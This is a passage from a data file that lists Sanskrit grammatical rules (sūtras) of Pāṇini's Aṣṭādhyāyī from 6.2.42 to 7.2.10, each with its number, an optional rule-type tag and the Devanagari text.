सादसादिसारथिषु","6.2.42::कुरुगार्हपतरिक्तगुर्वसूतजरत्यश्लीलदृढरूपापारेवडवातैतिलकद्रूःपण्यकम्बलो दासीभाराणां च","6.2.43::चतुर्थी तदर्थे","6.2.44::अर्थे","6.2.45::क्ते च","6.2.46::कर्मधारयेऽनिष्ठा","6.2.47::अहीने द्वितीया","6.2.48::तृतीया कर्मणि","6.2.49::गतिरनन्तरः","6.2.50::तादौ च निति कृत्यतौ","6.2.51::तवै चान्तश्च युगपत्","6.2.52::अनिगन्तोऽञ्चतौ वप्रत्यये","6.2.53::न्यधी च","6.2.54::ईषदन्यतरस्याम्","6.2.55::हिरण्यपरिमाणं धने","6.2.56::प्रथमोऽचिरोपसम्पत्तौ","6.2.57::कतरकतमौ कर्मधारये","6.2.58::आर्यो ब्राह्मणकुमारयोः","6.2.59::राजा च","6.2.60::षष्ठी प्रत्येनसि","6.2.61::क्ते नित्यार्थे","6.2.62::ग्रामः शिल्पिनि","6.2.63::राजा च प्रशंसायाम्","6.2.64:अधिकारः:आदिरुदात्तः","6.2.65::सप्तमीहारिणौ धर्म्येऽहरणे","6.2.66::युक्ते च","6.2.67::विभाषाऽध्यक्षे","6.2.68::पापं च शिल्पिनि","6.2.69::गोत्रान्तेवासिमाणवब्राह्मणेषु क्षेपे","6.2.70::अङ्गानि मैरेये","6.2.71::भक्ताख्यास्तदर्थेषु","6.2.72::गोबिडालसिंहसैन्धवेषूपमाने","6.2.73::अके जीविकाऽर्थे","6.2.74::प्राचां क्रीडायाम्","6.2.75::अणि नियुक्ते","6.2.76::शिल्पिनि चाकृञः","6.2.77::संज्ञायां च","6.2.78::गोतन्तियवं पाले","6.2.79::णिनि","6.2.80::उपमानं शब्दार्थप्रकृतावेव","6.2.81::युक्तारोह्यादयश्च","6.2.82::दीर्घकाशतुषभ्राष्ट्रवटं जे","6.2.83::अन्त्यात् पूर्वं बह्वचः","6.2.84::ग्रामेऽनिवसन्तः","6.2.85::घोषादिषु","6.2.86::छात्र्यादयः शालायाम्","6.2.87::प्रस्थेऽवृद्धमकर्क्यादीनाम्","6.2.88::मालाऽऽदीनां च","6.2.89::अमहन्नवं नगरेऽनुदीचाम्","6.2.90::अर्मे चावर्णं द्व्यच्त्र्यच्","6.2.91::न भूताधिकसंजीवमद्राश्मकज्जलम्","6.2.92:अधिकारः:अन्तः","6.2.93::सर्वं गुणकार्त्स्न्ये","6.2.94::संज्ञायां गिरिनिकाययोः","6.2.95::कुमार्यां वयसि","6.2.96::उदकेऽकेवले","6.2.97::द्विगौ 
क्रतौ","6.2.98::सभायां नपुंसके","6.2.99::पुरे प्राचाम्","6.2.100::अरिष्टगौडपूर्वे च","6.2.101::न हास्तिनफलकमार्देयाः","6.2.102::कुसूलकूपकुम्भशालं बिले","6.2.103::दिक्शब्दा ग्रामजनपदाख्यानचानराटेषु","6.2.104::आचार्योपसर्जनश्चान्तेवासिनि","6.2.105::उत्तरपदवृद्धौ सर्वं च","6.2.106::बहुव्रीहौ विश्वं संज्ञयाम्","6.2.107::उदराश्वेषुषु","6.2.108::क्षेपे","6.2.109::नदी बन्धुनि","6.2.110::निष्ठोपसर्गपूर्वमन्यतरस्याम्","6.2.111:अधिकारः:उत्तरपदादिः","6.2.112::कर्णो वर्णलक्षणात्","6.2.113::संज्ञौपम्ययोश्च","6.2.114::कण्ठपृष्ठग्रीवाजंघं च","6.2.115::शृङ्गमवस्थायां च","6.2.116::नञो जरमरमित्रमृताः","6.2.117::सोर्मनसी अलोमोषसी","6.2.118::क्रत्वादयश्च","6.2.119::आद्युदात्तं द्व्यच् छन्दसि","6.2.120::वीरवीर्यौ च","6.2.121::कूलतीरतूलमूलशालाऽक्षसममव्ययीभावे","6.2.122::कंसमन्थशूर्पपाय्यकाण्डं द्विगौ","6.2.123::तत्पुरुषे शालायां नपुंसके","6.2.124::कन्था च","6.2.125::आदिश्चिहणादीनाम्","6.2.126::चेलखेटकटुककाण्डं गर्हायाम्","6.2.127::चीरमुपमानम्","6.2.128::पललसूपशाकं मिश्रे","6.2.129::कूलसूदस्थलकर्षाः संज्ञायाम्","6.2.130::अकर्मधारये राज्यम्","6.2.131::वर्ग्यादयश्च","6.2.132::पुत्रः पुंभ्यः","6.2.133::नाचार्यराजर्त्विक्संयुक्तज्ञात्याख्येभ्यः","6.2.134::चूर्णादीन्यप्राणिषष्ठ्याः","6.2.135::षट् च काण्डादीनि","6.2.136::कुण्डं वनम्","6.2.137::प्रकृत्या भगालम्","6.2.138::शितेर्नित्याबह्वज्बहुव्रीहावभसत्","6.2.139::गतिकारकोपपदात् कृत्","6.2.140::उभे वनस्पत्यादिषु युगपत्","6.2.141::देवताद्वंद्वे च","6.2.142::नोत्तरपदेऽनुदात्तादावपृथिवीरुद्रपूषमन्थिषु","6.2.143:अधिकारः:अन्तः","6.2.144::थाथघञ्क्ताजबित्रकाणाम्","6.2.145::सूपमानात् क्तः","6.2.146::संज्ञायामनाचितादीनाम्","6.2.147::प्रवृद्धादीनां च","6.2.148::कारकाद्दत्तश्रुतयोरेवाशिषि","6.2.149::इत्थम्भूतेन कृतमिति च","6.2.150::अनो भावकर्मवचनः","6.2.151::मन्क्तिन्व्याख्यानशयनासनस्थानयाजकादिक्रीताः","6.2.152::सप्तम्याः पुण्यम्","6.2.153::ऊनार्थकलहं तृतीयायाः","6.2.154::मिश्रं चानुपसर्गमसंधौ","6.2.155::नञो गुणप्रतिषेधे सम्पाद्यर्हहितालमर्थास्तद्धिताः","6.2.156::ययतोश्चातदर्थे","6.2.157::अच्कावशक्तौ","6.2.158::आक्रोशे च","6.2.159::संज्ञायाम्","6.2.160::कृत्योकेष्णुच्चार्वादयश्च","6.2.161::विभाषा तृन्नन्नतीक्ष्णशुचिषु","6.2.162::बहुव्रीहाविदमेतत्तद्भ्यः प्रथमपूरणयोः क्रियागणने","6.2.163::संख्यायाः स्तनः","6.2.164::विभाषा छन्दसि","6.2.165::संज्ञायां मित्राजिनयोः","6.2.166::व्यवायिनोऽन्तरम्","6.2.167::मुखं स्वाङ्गम्","6.2.168::नाव्ययदिक्शब्दगोमहत्स्थूलमुष्टिपृथुवत्सेभ्यः","6.2.169::निष्ठोपमानादन्यतरस्याम्","6.2.170::जातिकालसुखादिभ्योऽनाच्छादनात् क्तोऽकृतमितप्रतिपन्नाः","6.2.171::वा जाते","6.2.172::नञ्सुभ्याम्","6.2.173::कपि पूर्वम्","6.2.174::ह्रस्वान्तेऽन्त्यात् पूर्वम्","6.2.175::बहोर्नञ्वदुत्तरपदभूम्नि","6.2.176::न गुणादयोऽवयवाः","6.2.177::उपसर्गात् स्वाङ्गं ध्रुवमपर्शु","6.2.178::वनं समासे","6.2.179::अन्तः","6.2.180::अन्तश्च","6.2.181::न निविभ्याम्","6.2.182::परेरभितोभाविमण्डलम्","6.2.183::प्रादस्वाङ्गं संज्ञायाम्","6.2.184::निरुदकादीनि च","6.2.185::अभेर्मुखम्","6.2.186::अपाच्च","6.2.187::स्फिगपूतवीणाऽञ्जोऽध्वकुक्षिसीरनामनाम च","6.2.188::अधेरुपरिस्थम्","6.2.189::अनोरप्रधानकनीयसी","6.2.190::पुरुषश्चान्वादिष्टः","6.2.191::अतेरकृत्पदे","6.2.192::नेरनिधाने","6.2.193::प्रतेरंश्वादयस्तत्पुरुषे","6.2.194::उपाद् द्व्यजजिनमगौरादयः","6.2.195::सोरवक्षेपणे","6.2.196::विभाषोत्पुच्छे","6.2.197::द्वित्रिभ्यां पाद्दन्मूर्धसु बहुव्रीहौ","6.2.198::सक्थं चाक्रान्तात्","6.2.199::परादिश्छन्दसि बहुलम्","6.3.1::अलुगुत्तरपदे","6.3.2::पञ्चम्याः स्तोकादिभ्यः","6.3.3::ओजःसहोऽम्भस्तमसः तृतीयायाः","6.3.4::मनसः संज्ञायाम्","6.3.5::आज्ञायिनि च","6.3.6::आत्मनश्च पूरणे","6.3.7::वैयाकरणाख्यायां चतुर्थ्याः","6.3.8::परस्य च","6.3.9::हलदन्तात् सप्तम्याः संज्ञायाम्","6.3.10::कारनाम्नि च प्राचां 
हलादौ","6.3.11::मध्याद्गुरौ","6.3.12::अमूर्धमस्तकात् स्वाङ्गादकामे","6.3.13::बन्धे च विभाषा","6.3.14::तत्पुरुषे कृति बहुलम्","6.3.15::प्रावृट्शरत्कालदिवां जे","6.3.16::विभाषा वर्षक्षरशरवरात्","6.3.17::घकालतनेषु कालनाम्नः","6.3.18::शयवासवासिषु अकालात्","6.3.19::नेन्सिद्धबध्नातिषु","6.3.20::स्थे च भाषायाम्","6.3.21::षष्ठ्या आक्रोशे","6.3.22::पुत्रेऽन्यतरस्याम्","6.3.23::ऋतो विद्यायोनिसम्बन्धेभ्यः","6.3.24::विभाषा स्वसृपत्योः","6.3.25::आनङ् ऋतो द्वंद्वे","6.3.26::देवताद्वंद्वे च","6.3.27::ईदग्नेः सोमवरुणयोः","6.3.28::इद्वृद्धौ","6.3.29::दिवो द्यावा","6.3.30::दिवसश्च पृथिव्याम्","6.3.31::उषासोषसः","6.3.32::मातरपितरावुदीचाम्","6.3.33::पितरामातरा च च्छन्दसि","6.3.34:अतिदेशः:स्त्रियाः पुंवद्भाषितपुंस्कादनूङ् समानाधिकरणे स्त्रियामपूरणीप्रियाऽऽदिषु","6.3.35:अतिदेशः:तसिलादिषु आकृत्वसुचः","6.3.36:अतिदेशः:क्यङ्मानिनोश्च","6.3.37:अतिदेशः:न कोपधायाः","6.3.38:अतिदेशः:संज्ञापूरण्योश्च","6.3.39:अतिदेशः:वृद्धिनिमित्तस्य च तद्धितस्यारक्तविकारे","6.3.40:अतिदेशः:स्वाङ्गाच्चेतोऽमानिनि","6.3.41:अतिदेशः:जातेश्च","6.3.42:अतिदेशः:पुंवत् कर्मधारयजातीयदेशीयेषु","6.3.43::घरूपकल्पचेलड्ब्रुवगोत्रमतहतेषु ङ्योऽनेकाचो ह्रस्वः","6.3.44::नद्याः शेषस्यान्यतरस्याम्","6.3.45::उगितश्च","6.3.46::आन्महतः समानाधिकरणजातीययोः","6.3.47::द्व्यष्टनः संख्यायामबहुव्रीह्यशीत्योः","6.3.48::त्रेस्त्रयः","6.3.49::विभाषा चत्वारिंशत्प्रभृतौ सर्वेषाम्","6.3.50::हृदयस्य हृल्लेखयदण्लासेषु","6.3.51::वा शोकष्यञ्रोगेषु","6.3.52::पादस्य पदाज्यातिगोपहतेषु","6.3.53::पद् यत्यतदर्थे","6.3.54::हिमकाषिहतिषु च","6.3.55::ऋचः शे","6.3.56::वा घोषमिश्रशब्देषु","6.3.57::उदकस्योदः संज्ञायाम्","6.3.58::पेषंवासवाहनधिषु च","6.3.59::एकहलादौ पूरयितव्येऽन्यतरस्याम्","6.3.60::मन्थौदनसक्तुबिन्दुवज्रभारहारवीवधगाहेषु च","6.3.61::इको ह्रस्वोऽङ्यो गालवस्य","6.3.62::एक तद्धिते च","6.3.63::ङ्यापोः संज्ञाछन्दसोर्बहुलम्","6.3.64::त्वे च","6.3.65::इष्टकेषीकामालानां चिततूलभारिषु","6.3.66::खित्यनव्ययस्य","6.3.67::अरुर्द्विषदजन्तस्य मुम्","6.3.68:अतिदेशः:इच एकाचोऽम्प्रत्ययवच्च","6.3.69::वाचंयमपुरंदरौ च","6.3.70::कारे सत्यागदस्य","6.3.71::श्येनतिलस्य पाते ञे","6.3.72::रात्रेः कृति विभाषा","6.3.73::नलोपो नञः","6.3.74::तस्मान्नुडचि","6.3.75::नभ्राण्नपान्नवेदानासत्यानमुचिनकुलनखनपुंसकनक्षत्रनक्रनाकेषु प्रकृत्या","6.3.76::एकादिश्चैकस्य चादुक्","6.3.77::नगोऽप्राणिष्वन्यतरस्याम्","6.3.78::सहस्य सः संज्ञायाम्","6.3.79::ग्रन्थान्ताधिके च","6.3.80::द्वितीये चानुपाख्ये","6.3.81::अव्ययीभावे चाकाले","6.3.82::वोपसर्जनस्य","6.3.83::प्रकृत्याऽऽशिष्यगोवत्सहलेषु","6.3.84::समानस्य छन्दस्यमूर्धप्रभृत्युदर्केषु","6.3.85::ज्योतिर्जनपदरात्रिनाभिनामगोत्ररूपस्थानवर्णवयोवचनबन्धुषु","6.3.86::चरणे ब्रह्मचारिणि","6.3.87::तीर्थे ये","6.3.88::विभाषोदरे","6.3.89::दृग्दृशवतुषु","6.3.90::इदङ्किमोरीश्की","6.3.91::आ सर्वनाम्नः","6.3.92::विष्वग्देवयोश्च टेरद्र्यञ्चतौ वप्रत्यये","6.3.93::समः समि","6.3.94::तिरसस्तिर्यलोपे","6.3.95::सहस्य सध्रिः","6.3.96::सध मादस्थयोश्छन्दसि","6.3.97::द्व्यन्तरुपसर्गेभ्योऽप ईत्","6.3.98::ऊदनोर्देशे","6.3.99::अषष्ठ्यतृतीयास्थस्यान्यस्य दुगाशिराशाऽऽस्थाऽऽस्थितोत्सुकोतिकारकरागच्छेषु","6.3.100::अर्थे विभाषा","6.3.101::कोः कत् तत्पुरुषेऽचि","6.3.102::रथवदयोश्च","6.3.103::तृणे च जातौ","6.3.104::का पथ्यक्षयोः","6.3.105::ईषदर्थे","6.3.106::विभाषा पुरुषे","6.3.107::कवं चोष्णे","6.3.108::पथि च च्छन्दसि","6.3.109::पृषोदरादीनि यथोपदिष्टम्","6.3.110::संख्याविसायपूर्वस्याह्नस्याहन्नन्यतरस्यां ङौ","6.3.111::ढ्रलोपे पूर्वस्य दीर्घोऽणः","6.3.112::सहिवहोरोदवर्णस्य","6.3.113::साढ्यै साढ्वा साढेति निगमे","6.3.114:अधिकारः:संहितायाम्","6.3.115::कर्णे लक्षणस्याविष्टाष्टपञ्चमणिभिन्नछिन्नछिद्रस्रुवस्वस्तिकस्य","6.3.116::नहिवृतिवृषिव्यधिरुचिसहितनिषु क्वौ","6.3.117::वनगिर्योः संज्ञायां 
कोटरकिंशुलकादीनाम्","6.3.118::वले","6.3.119::मतौ बह्वचोऽनजिरादीनाम्","6.3.120::शरादीनां च","6.3.121::इकः वहे अपीलोः","6.3.122::उपसर्गस्य घञ्यमनुष्ये बहुलम्","6.3.123::इकः काशे","6.3.124::दस्ति","6.3.125::अष्टनः संज्ञायाम्","6.3.126::छन्दसि च","6.3.127::चितेः कपि","6.3.128::विश्वस्य वसुराटोः","6.3.129::नरे संज्ञायाम्","6.3.130::मित्रे चर्षौ","6.3.131::मन्त्रे सोमाश्वेन्द्रियविश्वदेव्यस्य मतौ","6.3.132::ओषधेश्च विभक्तावप्रथमायाम्","6.3.133::ऋचि तुनुघमक्षुतङ्कुत्रोरुष्याणाम्","6.3.134::इकः सुञि","6.3.135::द्व्यचोऽतस्तिङः","6.3.136::निपातस्य च","6.3.137::अन्येषामपि दृश्यते","6.3.138::चौ","6.3.139::सम्प्रसारणस्य","6.4.1:अधिकारः:अङ्गस्य","6.4.2::हलः","6.4.3::नामि","6.4.4::न तिसृचतसृ","6.4.5::छन्दस्युभयथा","6.4.6::नृ च","6.4.7::नोपधायाः","6.4.8::सर्वनामस्थाने चासम्बुद्धौ","6.4.9::वा षपूर्वस्य निगमे","6.4.10::सान्तमहतः संयोगस्य","6.4.11::अप्तृन्तृच्स्वसृनप्तृनेष्टृत्वष्टृक्षत्तृहोतृपोतृप्रशास्तॄणाम्","6.4.12::इन्हन्पूषार्यम्णां शौ","6.4.13::सौ च","6.4.14::अत्वसन्तस्य चाधातोः","6.4.15::अनुनासिकस्य क्विझलोः क्ङिति","6.4.16::अज्झनगमां सनि","6.4.17::तनोतेर्विभाषा","6.4.18::क्रमश्च क्त्वि","6.4.19::च्छ्वोः शूडनुनासिके च","6.4.20::ज्वरत्वरश्रिव्यविमवामुपधायाश्च","6.4.21::राल्लोपः","6.4.22:अतिदेशः; अधिकारः:असिद्धवदत्राभात्","6.4.23:अतिदेशः:श्नान्नलोपः","6.4.24:अतिदेशः:अनिदितां हल उपधायाः क्ङिति","6.4.25:अतिदेशः:दन्शसञ्जस्वञ्जां शपि","6.4.26:अतिदेशः:रञ्जेश्च","6.4.27:अतिदेशः:घञि च भावकरणयोः","6.4.28:अतिदेशः:स्यदो जवे","6.4.29:अतिदेशः:अवोदैधौद्मप्रश्रथहिमश्रथाः","6.4.30:अतिदेशः:नाञ्चेः पूजायाम्","6.4.31:अतिदेशः:क्त्वि स्कन्दिस्यन्दोः","6.4.32:अतिदेशः:जान्तनशां विभाषा","6.4.33:अतिदेशः:भञ्जेश्च चिणि","6.4.34:अतिदेशः:शास इदङ्हलोः","6.4.35:अतिदेशः:शा हौ","6.4.36:अतिदेशः:हन्तेर्जः","6.4.37:अतिदेशः:अनुदात्तोपदेशवनतितनोत्यादीनामनुनासिकलोपो झलि क्ङिति","6.4.38:अतिदेशः:वा ल्यपि","6.4.39:अतिदेशः:न क्तिचि दीर्घश्च","6.4.40:अतिदेशः:गमः क्वौ","6.4.41:अतिदेशः:विड्वनोरनुनासिकस्यात्","6.4.42:अतिदेशः:जनसनखनां सञ्झलोः","6.4.43:अतिदेशः:ये विभाषा","6.4.44:अतिदेशः:तनोतेर्यकि","6.4.45:अतिदेशः:सनः क्तिचि लोपश्चास्यान्यतरस्याम्","6.4.46:अतिदेशः; अधिकारः:आर्धधातुके","6.4.47:अतिदेशः:भ्रस्जो रोपधयोः रमन्यतरस्याम्","6.4.48:अतिदेशः:अतो लोपः","6.4.49:अतिदेशः:यस्य हलः","6.4.50:अतिदेशः:क्यस्य विभाषा","6.4.51:अतिदेशः:णेरनिटि","6.4.52:अतिदेशः:निष्ठायां सेटि","6.4.53:अतिदेशः:जनिता मन्त्रे","6.4.54:अतिदेशः:शमिता यज्ञे","6.4.55:अतिदेशः:अयामन्ताल्वाय्येत्न्विष्णुषु","6.4.56:अतिदेशः:ल्यपि लघुपूर्वात्","6.4.57:अतिदेशः:विभाषाऽऽपः","6.4.58:अतिदेशः:युप्लुवोर्दीर्घश्छन्दसि","6.4.59:अतिदेशः:क्षियः","6.4.60:अतिदेशः:निष्ठायां अण्यदर्थे","6.4.61:अतिदेशः:वाऽऽक्रोशदैन्ययोः","6.4.62:अतिदेशः:स्यसिच्सीयुट्तासिषु भावकर्मणोरुपदेशेऽज्झनग्रहदृशां वा चिण्वदिट् च","6.4.63:अतिदेशः:दीङो युडचि क्ङिति","6.4.64:अतिदेशः:आतो लोप इटि च","6.4.65:अतिदेशः:ईद्यति","6.4.66:अतिदेशः:घुमास्थागापाजहातिसां हलि","6.4.67:अतिदेशः:एर्लिङि","6.4.68:अतिदेशः:वाऽन्यस्य संयोगादेः","6.4.69:अतिदेशः:न ल्यपि","6.4.70:अतिदेशः:मयतेरिदन्यतरस्याम्","6.4.71:अतिदेशः:लुङ्लङ्लृङ्क्ष्वडुदात्तः","6.4.72:अतिदेशः:आडजादीनाम्","6.4.73:अतिदेशः:छन्दस्यपि दृश्यते","6.4.74:अतिदेशः:न माङ्योगे","6.4.75:अतिदेशः:बहुलं छन्दस्यमाङ्योगेऽपि","6.4.76:अतिदेशः:इरयो रे","6.4.77:अतिदेशः:अचि श्नुधातुभ्रुवां य्वोरियङुवङौ","6.4.78:अतिदेशः:अभ्यासस्यासवर्णे","6.4.79:अतिदेशः:स्त्रियाः","6.4.80:अतिदेशः:वाऽम्शसोः","6.4.81:अतिदेशः:इणो यण्","6.4.82:अतिदेशः:एरनेकाचोऽसंयोगपूर्वस्य","6.4.83:अतिदेशः:ओः सुपि","6.4.84:अतिदेशः:वर्षाभ्वश्च","6.4.85:अतिदेशः:न भूसुधियोः","6.4.86:अतिदेशः:छन्दस्युभयथा","6.4.87:अतिदेशः:हुश्नुवोः सार्वधातुके","6.4.88:अतिदेशः:भुवो वुग्लुङ्लिटोः","6.4.89:अतिदेशः:ऊदुपधाया गोहः","6.4.90:अतिदेशः:दोषो 
णौ","6.4.91:अतिदेशः:वा चित्तविरागे","6.4.92:अतिदेशः:मितां ह्रस्वः","6.4.93:अतिदेशः:चिण्णमुलोर्दीर्घोऽन्यतरस्याम्","6.4.94:अतिदेशः:खचि ह्रस्वः","6.4.95:अतिदेशः:ह्लादो निष्ठायाम्","6.4.96:अतिदेशः:छादेर्घेऽद्व्युपसर्गस्य","6.4.97:अतिदेशः:इस्मन्त्रन्क्विषु च","6.4.98:अतिदेशः:गमहनजनखनघसां लोपः क्ङित्यनङि","6.4.99:अतिदेशः:तनिपत्योश्छन्दसि","6.4.100:अतिदेशः:घसिभसोर्हलि च","6.4.101:अतिदेशः:हुझल्भ्यो हेर्धिः","6.4.102:अतिदेशः:श्रुशृणुपॄकृवृभ्यश्छन्दसि","6.4.103:अतिदेशः:अङितश्च","6.4.104:अतिदेशः:चिणो लुक्","6.4.105:अतिदेशः:अतो हेः","6.4.106:अतिदेशः:उतश्च प्रत्ययादसंयोगपूर्वात्","6.4.107:अतिदेशः:लोपश्चास्यान्यतरस्यां म्वोः","6.4.108:अतिदेशः:नित्यं करोतेः","6.4.109:अतिदेशः:ये च","6.4.110:अतिदेशः:अत उत् सार्वधातुके","6.4.111:अतिदेशः:श्नसोरल्लोपः","6.4.112:अतिदेशः:श्नाऽभ्यस्तयोरातः","6.4.113:अतिदेशः:ई हल्यघोः","6.4.114:अतिदेशः:इद्दरिद्रस्य","6.4.115:अतिदेशः:भियोऽन्यतरस्याम्","6.4.116:अतिदेशः:जहातेश्च","6.4.117:अतिदेशः:आ च हौ","6.4.118:अतिदेशः:लोपो यि","6.4.119:अतिदेशः:घ्वसोरेद्धावभ्यासलोपश्च","6.4.120:अतिदेशः:अत एकहल्मध्येऽनादेशादेर्लिटि","6.4.121:अतिदेशः:थलि च सेटि","6.4.122:अतिदेशः:तॄफलभजत्रपश्च","6.4.123:अतिदेशः:राधो हिंसायाम्","6.4.124:अतिदेशः:वा जॄभ्रमुत्रसाम्","6.4.125:अतिदेशः:फणां च सप्तानाम्","6.4.126:अतिदेशः:न शसददवादिगुणानाम्","6.4.127:अतिदेशः:अर्वणस्त्रसावनञः","6.4.128:अतिदेशः:मघवा बहुलम्","6.4.129:अतिदेशः; अधिकारः:भस्य","6.4.130:अतिदेशः:पादः पत्","6.4.131:अतिदेशः:वसोः सम्प्रसारणम्","6.4.132:अतिदेशः:वाह ऊठ्","6.4.133:अतिदेशः:श्वयुवमघोनामतद्धिते","6.4.134:अतिदेशः:अल्लोपोऽनः","6.4.135:अतिदेशः:षपूर्वहन्धृतराज्ञामणि","6.4.136:अतिदेशः:विभाषा ङिश्योः","6.4.137:अतिदेशः:न संयोगाद्वमन्तात्","6.4.138:अतिदेशः:अचः","6.4.139:अतिदेशः:उद ईत्","6.4.140:अतिदेशः:आतो धातोः","6.4.141:अतिदेशः:मन्त्रेष्वाङ्यादेरात्मनः","6.4.142:अतिदेशः:ति विंशतेर्डिति","6.4.143:अतिदेशः:टेः","6.4.144:अतिदेशः:नस्तद्धिते","6.4.145:अतिदेशः:अह्नष्टखोरेव","6.4.146:अतिदेशः:ओर्गुणः","6.4.147:अतिदेशः:ढे लोपोऽकद्र्वाः","6.4.148:अतिदेशः:यस्येति च","6.4.149:अतिदेशः:सूर्यतिष्यागस्त्यमत्स्यानां य उपधायाः","6.4.150:अतिदेशः:हलस्तद्धितस्य","6.4.151:अतिदेशः:आपत्यस्य च तद्धितेऽनाति","6.4.152:अतिदेशः:क्यच्व्योश्च","6.4.153:अतिदेशः:बिल्वकादिभ्यश्छस्य लुक्","6.4.154:अतिदेशः:तुरिष्ठेमेयस्सु","6.4.155:अतिदेशः:टेः","6.4.156:अतिदेशः:स्थूलदूरयुवह्रस्वक्षिप्रक्षुद्राणां यणादिपरं पूर्वस्य च गुणः","6.4.157:अतिदेशः:प्रियस्थिरस्फिरोरुबहुलगुरुवृद्धतृप्रदीर्घवृन्दारकाणां प्रस्थस्फवर्बंहिगर्वर्षित्रब्द्राघिवृन्दाः","6.4.158:अतिदेशः:बहोर्लोपो भू च बहोः","6.4.159:अतिदेशः:इष्ठस्य यिट् च","6.4.160:अतिदेशः:ज्यादादीयसः","6.4.161:अतिदेशः:र ऋतो हलादेर्लघोः","6.4.162:अतिदेशः:विभाषर्जोश्छन्दसि","6.4.163:अतिदेशः:प्रकृत्यैकाच्","6.4.164:अतिदेशः:इनण्यनपत्ये","6.4.165:अतिदेशः:गाथिविदथिकेशिगणिपणिनश्च","6.4.166:अतिदेशः:संयोगादिश्च","6.4.167:अतिदेशः:अन्","6.4.168:अतिदेशः:ये चाभावकर्मणोः","6.4.169:अतिदेशः:आत्माध्वानौ खे","6.4.170:अतिदेशः:न मपूर्वोऽपत्येऽवर्मणः","6.4.171:अतिदेशः:ब्राह्मोअजातौ","6.4.172:अतिदेशः:कार्मस्ताच्छील्ये","6.4.173:अतिदेशः:औक्षमनपत्ये","6.4.174:अतिदेशः:दाण्डिनायनहास्तिनायनाथर्वणिकजैह्माशिनेयवाशिनायनिभ्रौणहत्यधैवत्यसारवैक्ष्वाकमैत्रेयहिरण्मयानि","6.4.175:अतिदेशः:ऋत्व्यवास्त्व्यवास्त्वमाध्वीहिरण्ययानि च्छन्दसि","7.1.1::युवोरनाकौ","7.1.2::आयनेयीनीयियः फढखच्छघां प्रत्ययादीनाम्","7.1.3::झोऽन्तः","7.1.4::अदभ्यस्तात्","7.1.5::आत्मनेपदेष्वनतः","7.1.6::शीङो रुट्","7.1.7::वेत्तेर्विभाषा","7.1.8::बहुलं छन्दसि","7.1.9::अतो भिस ऐस्","7.1.10::बहुलं छन्दसि","7.1.11::नेदमदसोरकोः","7.1.12::टाङसिङसामिनात्स्याः","7.1.13::ङेर्यः","7.1.14::सर्वनाम्नः स्मै","7.1.15::ङसिङ्योः स्मात्स्मिनौ","7.1.16::पूर्वादिभ्यो नवभ्यो वा","7.1.17::जसः शी","7.1.18::औङ 
आपः","7.1.19::नपुंसकाच्च","7.1.20::जश्शसोः शिः","7.1.21::अष्टाभ्य औश्","7.1.22::षड्भ्यो लुक्","7.1.23::स्वमोर्नपुंसकात्","7.1.24::अतोऽम्","7.1.25::अद्ड् डतरादिभ्यः पञ्चभ्यः","7.1.26::नेतराच्छन्दसि","7.1.27::युष्मदस्मद्भ्यां ङसोऽश्","7.1.28::ङे प्रथमयोरम्","7.1.29::शसो न","7.1.30::भ्यसो भ्यम्","7.1.31::पञ्चम्या अत्","7.1.32::एकवचनस्य च","7.1.33::साम आकम्","7.1.34::आत औ णलः","7.1.35::तुह्योस्तातङाशिष्यन्यतरस्याम्","7.1.36::विदेः शतुर्वसुः","7.1.37::समासेऽनञ्पूर्वे क्त्वो ल्यप्","7.1.38::क्त्वाऽपि छन्दसि","7.1.39::सुपां सुलुक्पूर्वसवर्णाऽऽच्छेयाडाड्यायाजालः","7.1.40::अमो मश्","7.1.41::लोपस्त आत्मनेपदेषु","7.1.42::ध्वमो ध्वात्","7.1.43::यजध्वैनमिति च","7.1.44::तस्य तात्","7.1.45::तप्तनप्तनथनाश्च","7.1.46::इदन्तो मसि","7.1.47::क्त्वो यक्","7.1.48::इष्ट्वीनमिति च","7.1.49::स्नात्व्यादयश्च","7.1.50::आज्जसेरसुक्","7.1.51::अश्वक्षीरवृषलवणानामात्मप्रीतौ क्यचि","7.1.52::आमि सर्वनाम्नः सुट्","7.1.53::त्रेस्त्रयः","7.1.54::ह्रस्वनद्यापो नुट्","7.1.55::षट्चतुर्भ्यश्च","7.1.56::श्रीग्रामण्योश्छन्दसि","7.1.57::गोः पादान्ते","7.1.58::इदितो नुम् धातोः","7.1.59::शे मुचादीनाम्","7.1.60::मस्जिनशोर्झलि","7.1.61::रधिजभोरचि","7.1.62::नेट्यलिटि रधेः","7.1.63::रभेरशब्लिटोः","7.1.64::लभेश्च","7.1.65::आङो यि","7.1.66::उपात् प्रशंसायाम्","7.1.67::उपसर्गात् खल्घञोः","7.1.68::न सुदुर्भ्यां केवलाभ्याम्","7.1.69::विभाषा चिण्णमुलोः","7.1.70::उगिदचां सर्वनामस्थानेऽधातोः","7.1.71::युजेरसमासे","7.1.72::नपुंसकस्य झलचः","7.1.73::इकोऽचि विभक्तौ","7.1.74::तृतीयाऽऽदिषु भाषितपुंस्कं पुंवद्गालवस्य","7.1.75::अस्थिदधिसक्थ्यक्ष्णामनङुदात्तः","7.1.76::छन्दस्यपि दृश्यते","7.1.77::ई च द्विवचने","7.1.78::नाभ्यस्ताच्छतुः","7.1.79::वा नपुंसकस्य","7.1.80::आच्छीनद्योर्नुम्","7.1.81::शप्श्यनोर्नित्यम्","7.1.82::सावनडुहः","7.1.83::दृक्स्ववस्स्वतवसां छन्दसि","7.1.84::दिव औत्","7.1.85::पथिमथ्यृभुक्षामात्","7.1.86::इतोऽत् सर्वनामस्थाने","7.1.87::थो न्थः","7.1.88::भस्य टेर्लोपः","7.1.89::पुंसोऽसुङ्","7.1.90:अतिदेशः:गोतो णित्","7.1.91:अतिदेशः:णलुत्तमो वा","7.1.92:अतिदेशः:सख्युरसम्बुद्धौ","7.1.93::अनङ् सौ","7.1.94::ऋदुशनस्पुरुदंसोऽनेहसां च","7.1.95:अतिदेशः:तृज्वत् क्रोष्टुः","7.1.96::स्त्रियां च","7.1.97::विभाषा तृतीयाऽऽदिष्वचि","7.1.98::चतुरनडुहोरामुदात्तः","7.1.99::अम् सम्बुद्धौ","7.1.100::ॠत इद्धातोः","7.1.101::उपधायाश्च","7.1.102::उदोष्ठ्यपूर्वस्य","7.1.103::बहुलं छन्दसि","7.2.1::सिचि वृद्धिः परस्मैपदेषु","7.2.2::अतो र्लान्तस्य","7.2.3::वदव्रजहलन्तस्याचः","7.2.4::नेटि","7.2.5::ह्म्यन्तक्षणश्वसजागृणिश्व्येदिताम्","7.2.6::ऊर्णोतेर्विभाषा","7.2.7::अतो हलादेर्लघोः","7.2.8::नेड् वशि कृति","7.2.9::तितुत्रतथसिसुसरकसेषु च","7.2.10::एकाच 